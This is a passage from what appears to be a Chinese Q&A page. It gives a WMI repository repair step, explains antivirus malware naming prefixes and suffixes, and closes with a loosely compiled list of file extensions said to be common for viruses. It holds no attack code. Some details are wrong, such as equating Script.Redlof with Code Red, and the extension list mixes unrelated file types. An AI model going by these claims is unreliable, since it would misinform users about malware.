4、 删除然后重新创建 Winnt/System32/Wbem/Repository 文件夹中的文件:在桌面上右击我的电脑,然后单击管理。 在"服务和应用程序"下,单击服务,然后关闭并停止 Windows Management Instrumentation 服务。 删除 Winnt/System32/Wbem/Repository 文件夹中的所有文件。(在删除前请创建这些文件的备份副本。) 打开"服务和应用程序",单击服务,然后打开并启动 Windows Management Instrumentation 服务。当服务重新启动时,将基于以下注册表项中所提供的信息重新创建这些文件: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/WBEM/CIMOM/Autorecover MOFs
那个能告诉我常见的病毒后缀名啊,
病毒的命名规则
病毒的命名并没有一个统一的规定,每个反病毒公司的命名规则都不太一样,但基本都是采用前、后缀法来进行命名的,可以是多个前缀、后缀组合,中间以小数点分隔,一般格式为:〔前缀〕.〔病毒名〕.〔后缀〕
1.病毒前缀
病毒前缀是指一个病毒的种类,我们常见的木马病毒的前缀是“Trojan”,蠕虫病毒的前缀是“Worm”,其他前缀还有如“Macro”、“Backdoor”、“Script”等。
2.病毒名
病毒名是指一个病毒名称,如以前很有名的CIH病毒,它和它的一些变种都是统一的“CIH”,还有振荡波蠕虫病毒,它的病毒名则是“Sasser”。
3.病毒后缀
病毒后缀是指一个病毒的变种特征,一般是采用英文中的26个字母来表示的,如 “Worm.Sasser.c”是指振荡波蠕虫病毒的变种c。如果病毒的变种太多了,那也可以采用数字和字母混合的方法来表示病毒的变种。
综上所述,一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型,就可以对这个病毒有个大概的评估(当然这需要积累一些常见病毒类型的相关知识,这不在本文讨论范围)。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。
病毒的命名解释
1.木马病毒
木马病毒的前缀是:Trojan。木马病毒的特点就是通过网络或者系统漏洞进入用户的系统并隐藏,然后再向外界泄露用户的信息。一般的木马如QQ消息尾巴Trojan.QQPSW.r,网络游戏木马病毒Trojan.StartPage.FH等。病毒名中有PSW或者什么PWD之类的是表示这个病毒有盗取密码的功能,所有这类病毒特别需要注意。
2.脚本病毒
脚本病毒的前缀是:Script。脚本病毒是用脚本语言编写,通过网页进行的传播的病毒,如红色代码Script.Redlof等。有些脚本病毒还会有VBS、HTML之类的前缀,是表示用何种脚本编写的,如欢乐时光VBS.Happytime、HTML.Reality.D等。
3.系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的特点是可以感染Windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播,如以前有名的CIH病毒就属于系统病毒。
4.宏病毒
宏病毒也可以算是脚本病毒的一种,由于它的特殊性,因此就单独算成一类。宏病毒的前缀是:Macro,第二前缀有Word、Word97、Excel、Excel97等,根据感染的文档类型来选择相应的第二前缀。该类病毒的特点就是能感染OFFICE系列的文档,然后通过OFFICE通用模板进行传播,如以前著名的美丽莎病毒Macro.Melissa。
5.蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的特点是可以通过网络或者系统漏洞来进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性,大家比较熟悉的这类病毒有冲击波、震荡波等。
6.捆绑机病毒
捆绑机病毒的前缀是:Binder。病毒作者会使用特定的捆绑程序把病毒与一些应用程序(如QQ等大家常用的软件)捆绑起来,表面上看去是个正常的文件,但当用户运行这些应用程序时,也同时运行了被捆绑在一起的病毒文件,从而给用户造成危害。如系统杀手Binder.killsys。
7.后门病毒
后门病毒的前缀是:Backdoor。该类病毒的特点就是通过网络传播来给中毒系统开后门,给用户电脑带来安全隐患。如爱情后门病毒Worm.Lovgate.a/b/c。
8.破坏性程序病毒
破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。
以上为比较常见的病毒前缀,有时候我们还会看到一些其他的,但比较少见,这里简单提一下:
DoS:会针对某台主机或者服务器进行DoS攻击;
Exploit:会自动通过溢出对方或者自己的系统漏洞来传播自身,或者他本身就是一个用于Hacking的溢出工具;
HackTool:黑客工具,也许本身并不破坏你的机子,但是会被别人加以利用来用你做替身去破坏别人。
你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况,达到知己知彼的效果。在杀毒无法自动查杀,打算采用手工方式的时候这些信息会给你很大的帮助
常见的病毒后缀多为exe,但是也有dll的及其很多种
ad[ep]
.asd
.ba[st]
.c[ho]m
.cmd
.cpl
.crt
.dbx
.dll
.exe
.hlp
.hta
.in[fs]
.isp
.js
.jse
.lnk
.md[etw]
.ms[cipt]
.nws
.ocx
.ops
.pcd
.pi
.prf
.reg
.scf
.scr
.sct
.sh[bms]
.uue
.vb
.vb[esx]
.vxd
.wab
.ws[cfh]
.cmd
.bat
.com
.exe
.scr
.cpl
.rtf
.wab
.cpp
.pas
.mp8
.bak
.mpg
.tmp
.wab
.dbx
.tbb
.sht
.mbx
.eml
.pmr
.fpt
.inb
.adb
.asp
.cfg
.cgi
.dbx
.dhtm
.eml
.jsp
.mbx
.mdx
.mht
.mmf
.msg
.nch
.ods
.oft
.php
.pl
.sht
.shtm
.stm
.tbb
.txt
.uin
.uin
.wab
.wsh
.vbs